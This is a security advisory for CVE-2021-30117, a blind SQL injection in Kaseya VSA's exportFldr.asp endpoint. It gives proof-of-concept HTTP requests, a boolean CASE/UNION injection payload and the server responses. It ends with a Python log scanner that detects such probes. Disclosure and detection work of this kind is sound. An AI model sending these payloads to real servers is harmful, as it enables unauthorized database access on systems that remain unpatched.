CVE-2021-30117 - Authenticated SQL injection in Kaseya VSA < v9.5.6
CVE | CVE-2021-30117 |
Case | DIVD-2021-00011 |
Discovered by | |
Credits | |
Products | Kaseya: |
Versions | Kaseya: |
CVSS | Base score: 9.8 |
References | |
Solution | SaaS: the version has been fixed by the vendor. On-premise: upgrade the server to version 9.5.6 or above and upgrade the agent to version 9.5.0.23 or above. |
Last modified | 20 Jun 2022 09:35 |
Description
The API call /InstallTab/exportFldr.asp is vulnerable to a semi-authenticated boolean-based blind SQL injection in the parameter fldrId.
Detailed description
Given the following request:
GET /InstallTab/exportFldr.asp?fldrId=1' HTTP/1.1
Host: 192.168.1.194
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519;
Here the sessionId cookie value has been obtained via CVE-2021-30116, which is why the injection is only semi-authenticated. The unbalanced quote in fldrId should make the request fail, and it does:
Response:
HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; Charset=Utf-8
Date: Thu, 01 Apr 2021 19:12:11 GMT
Strict-Transport-Security: max-age=63072000; includeSubDomains
Connection: close
Content-Length: 881
<!DOCTYPE html>
<HTML>
<HEAD>
<title>Whoops.</title>
<meta http-equiv="X-UA-Compatible" content="IE=Edge" />
<link id="favIcon" rel="shortcut icon" href="/themes/default/images/favicon.ico?307447361"></link>
----SNIP----
However, when fldrId is set to '(SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END))' the request is allowed. The CASE expression yields a single value when its condition is true and a two-row subquery (a SQL error) when it is false, so the HTTP status alone reveals whether the condition held; that is what makes this a boolean-based blind injection.
Request:
GET /InstallTab/exportFldr.asp?fldrId=%28SELECT%20%28CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%20%28SELECT%201%20UNION%20SELECT%202%29%20END%29%29 HTTP/1.1
Host: 192.168.1.194
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519;
Response:
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; Charset=Utf-8
Date: Thu, 01 Apr 2021 17:33:53 GMT
Strict-Transport-Security: max-age=63072000; includeSubDomains
Connection: close
Content-Length: 7960
<html>
<head>
<title>Export Folder</title>
<style>
------ SNIP -----
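As an added example that is not part of the DIVD advisory, the following Python scanner flags requests to the endpoint above whose fldrId is not a plain integer. It runs over constructed log lines in a simplified IIS W3C layout (the field order is an assumption); the two requests shown in the advisory are reproduced as sample lines.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Constructed sample lines (not from the advisory) in a simplified IIS W3C
# layout: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2021-04-01 19:10:02 10.0.0.5 GET /InstallTab/exportFldr.asp fldrId=17 200
2021-04-01 19:12:11 10.0.0.7 GET /InstallTab/exportFldr.asp fldrId=1' 500
2021-04-01 17:33:53 10.0.0.7 GET /InstallTab/exportFldr.asp fldrId=%28SELECT%20%28CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%20%28SELECT%201%20UNION%20SELECT%202%29%20END%29%29 200
2021-04-01 19:14:20 10.0.0.9 GET /themes/default/images/favicon.ico - 200
"""

TARGET_PATH = "/installtab/exportfldr.asp"  # endpoint named in the advisory
INTEGER_RE = re.compile(r"^[0-9]{1,10}$")    # a folder id is digits only

def parse_line(line):
    """Split one log line into a dict; returns None for malformed lines."""
    fields = line.split()
    if len(fields) != 7:
        return None
    date, clock, client, method, stem, query, status = fields
    return {"time": f"{date} {clock}", "client": client, "method": method,
            "stem": stem, "query": "" if query == "-" else query,
            "status": int(status)}

def suspicious_fldr_id(query):
    """Return the decoded fldrId if it is not a plain integer, else None.
    Keys match case-insensitively (ASP collections are); a second decode catches %2527."""
    for key, values in parse_qs(query, keep_blank_values=True).items():
        if key.lower() != "fldrid":
            continue
        for raw in values:
            value = unquote_plus(raw)
            if not INTEGER_RE.match(value):
                return value
    return None

def scan_log(text):
    """One finding per request to the export endpoint with a non-numeric fldrId."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["stem"].lower() != TARGET_PATH:
            continue
        bad = suspicious_fldr_id(rec["query"])
        if bad is not None:
            findings.append({"time": rec["time"], "client": rec["client"],
                             "status": rec["status"], "fldrId": bad})
    return findings
```

Calling scan_log(SAMPLE_LOG) returns the two probe requests (the 500 from the stray quote and the 200 from the CASE expression) and ignores the legitimate numeric request.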